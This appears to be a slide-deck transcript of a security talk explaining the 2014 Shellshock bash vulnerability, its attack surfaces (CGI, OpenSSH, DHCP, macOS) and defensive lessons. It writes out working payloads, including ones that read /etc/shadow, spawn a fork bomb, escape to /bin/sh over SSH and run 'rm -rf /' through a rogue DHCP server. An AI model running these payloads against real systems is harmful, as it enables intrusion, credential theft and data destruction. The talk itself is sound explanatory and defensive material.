ShellShock

Transcript

1. CVE-2014-6271 CVE-2014-7169 "shellshock"

2. • Who does it impact? Bash 1.13 to 4.3. If

   you installed bash from between 1992 to now. • Where is bash used?

3. What's the attack? Define a function within an environment variable,

   whatever you place after will be executed. foo () { ignored; }; my attack code goes here. env bar='() { :; }; echo vulnerable' bash -c 'echo hello world' Output; vulnerable hello world

4. Common Gateway to Hell • Any calls to cgi (common

   gateway interface) services pass http client header variables as environment variables. Such as "user-agent”, or “referer”. • User-agent switcher for Chrome; () { :; }; (){ :|: & };: • Nameless major vendor; () { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/shadow

5. People are already mass scanning 209.126.230.72 - - [24/Sep/2014:23:53:34 -0300]

   "GET / HTTP/1.0" 200 12761 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/ 2014/09/bash-shellshock-scan-of-internet.html)“

6. OpenSSH isn't safe • From sshd_config: # Allow client to

   pass locale environment variables AcceptEnv LANG LC_* • This means ForceCommand can be escaped $ env LC_NINJA='() { :; }; /bin/sh' ssh victimhost • SSH_ORIGINAL_COMMAND is set anyways $ ssh victimhost '() { :; }; /bin/sh' • You use "internal-sftp" right? • Why do we care about ForceCommand?

7. DHCP • dhcpcd/dhclient makes system() calls • Rogue DHCP servers

   can execute arbitrary commands on hosts (usually as uid=0) /etc/dhcp/dhcpd.conf: option default-url "() { :; }; rm -rf /"; • Consider using "ip dhcp snooping vlan 100,110,115,...”

8. Et tu, Mac OS X? • Bash 3.2.51 is installed

   at /bin/sh • Can be leveraged to get root, suid anyone? • Apple dhcp client does not use system() calls

9. What have we learned?

10. What should we have learned? • Widely deployed OSS software

    should be audited, especially if old • Often they are, but not by nice people • Data received from untrusted sources should be sanitized, before used • Switch default shell? /bin/sh -> dash or tcsh • Disable function importing by default?